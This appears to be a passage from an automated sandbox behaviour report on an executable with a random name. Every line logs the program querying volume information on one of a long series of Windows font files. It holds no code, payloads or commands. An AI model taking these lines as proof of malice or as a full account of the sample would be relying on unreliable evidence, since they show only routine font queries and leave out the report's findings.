          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
